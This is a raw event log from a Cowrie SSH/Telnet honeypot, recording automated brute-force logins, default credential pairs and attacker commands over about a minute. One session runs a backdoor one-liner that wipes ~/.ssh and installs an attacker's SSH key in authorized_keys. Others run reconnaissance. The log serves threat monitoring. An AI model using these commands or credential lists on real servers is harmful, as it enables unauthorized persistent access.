{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48016,"dst_ip":"1.2.3.4","dst_port":22,"session":"e07ee4e02f19","protocol":"ssh","message":"New connection: 212.227.125.160:48016 (1.2.3.4:22) [session: e07ee4e02f19]","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.213201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.213874Z","src_ip":"212.227.125.160","session":"e07ee4e02f19"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.281500Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.317571Z","src_ip":"212.227.125.160","session":"e07ee4e02f19"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:43.626793Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.627573Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.732641Z","src_ip":"212.227.125.160","session":"e07ee4e02f19"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.733781Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:43.735041Z","src_ip":"212.227.125.160","session":"91327a75e840"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:44.185802Z","src_ip":"212.227.235.229","session":"4e8caae03c9f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:44.838800Z","src_ip":"212.227.125.160","session":"e07ee4e02f19"}
{"eventid":"cowrie.session.connect","src_ip":"103.48.84.20","src_port":53560,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aa8d03473ec","protocol":"ssh","message":"New connection: 103.48.84.20:53560 (1.2.3.4:22) [session: 9aa8d03473ec]","sensor":"my-vps","timestamp":"2025-08-28T05:33:45.581331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:45.583038Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:45.793560Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.login.success","username":"root","password":"mimi","message":"login attempt [root/mimi] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:46.897563Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:47.337483Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:33:47.338288Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:33:47.339164Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:47.543140Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:48.177481Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.178265Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.382504Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.383542Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.session.connect","src_ip":"103.48.84.20","src_port":53570,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7c9e9087904","protocol":"ssh","message":"New connection: 103.48.84.20:53570 (1.2.3.4:22) [session: e7c9e9087904]","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.583891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.584550Z","src_ip":"103.48.84.20","session":"e7c9e9087904"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:48.793825Z","src_ip":"103.48.84.20","session":"e7c9e9087904"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:49.766417Z","src_ip":"103.48.84.20","session":"e7c9e9087904"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:50.972151Z","src_ip":"103.48.84.20","session":"e7c9e9087904"}
{"eventid":"cowrie.session.connect","src_ip":"103.48.84.20","src_port":53582,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d087c4d5167","protocol":"ssh","message":"New connection: 103.48.84.20:53582 (1.2.3.4:22) [session: 0d087c4d5167]","sensor":"my-vps","timestamp":"2025-08-28T05:33:51.174786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:33:51.175708Z","src_ip":"103.48.84.20","session":"0d087c4d5167"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:33:51.384356Z","src_ip":"103.48.84.20","session":"0d087c4d5167"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:52.403710Z","src_ip":"103.48.84.20","session":"0d087c4d5167"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":45368,"dst_ip":"1.2.3.4","dst_port":23,"session":"faf40d2eba7f","protocol":"telnet","message":"New connection: 79.124.8.120:45368 (1.2.3.4:23) [session: faf40d2eba7f]","sensor":"my-vps","timestamp":"2025-08-28T05:33:52.550171Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:33:52.589767Z","src_ip":"79.124.8.120","session":"faf40d2eba7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:33:52.679899Z","src_ip":"79.124.8.120","session":"faf40d2eba7f"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:52.758810Z","src_ip":"103.48.84.20","session":"9aa8d03473ec"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:33:52.759773Z","src_ip":"103.48.84.20","session":"0d087c4d5167"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35690,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf21319b78f0","protocol":"ssh","message":"New connection: 212.227.125.160:35690 (1.2.3.4:22) [session: cf21319b78f0]","sensor":"my-vps","timestamp":"2025-08-28T05:33:58.509692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:33:58.738100Z","src_ip":"212.227.125.160","session":"cf21319b78f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:33:58.739161Z","src_ip":"212.227.125.160","session":"cf21319b78f0"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:33:59.901728Z","src_ip":"212.227.125.160","session":"cf21319b78f0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:01.007871Z","src_ip":"212.227.125.160","session":"cf21319b78f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53306,"dst_ip":"1.2.3.4","dst_port":22,"session":"69553a2aedcd","protocol":"ssh","message":"New connection: 212.227.235.229:53306 (1.2.3.4:22) [session: 69553a2aedcd]","sensor":"my-vps","timestamp":"2025-08-28T05:34:05.211921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:05.212865Z","src_ip":"212.227.235.229","session":"69553a2aedcd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:05.355829Z","src_ip":"212.227.235.229","session":"69553a2aedcd"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:34:05.787835Z","src_ip":"212.227.235.229","session":"69553a2aedcd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:06.932560Z","src_ip":"212.227.235.229","session":"69553a2aedcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55892,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3418920c3e8","protocol":"ssh","message":"New connection: 212.227.235.229:55892 (1.2.3.4:22) [session: b3418920c3e8]","sensor":"my-vps","timestamp":"2025-08-28T05:34:19.613042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:19.645036Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:34:19.769021Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:34:20.336388Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:34:20.644205Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:34:20.644679Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:20.801257Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:34:20.802291Z","src_ip":"212.227.235.229","session":"b3418920c3e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56458,"dst_ip":"1.2.3.4","dst_port":22,"session":"de5b9bd3ffad","protocol":"ssh","message":"New connection: 212.227.125.160:56458 (1.2.3.4:22) [session: de5b9bd3ffad]","sensor":"my-vps","timestamp":"2025-08-28T05:34:27.299165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:34:27.334331Z","src_ip":"212.227.125.160","session":"de5b9bd3ffad"}
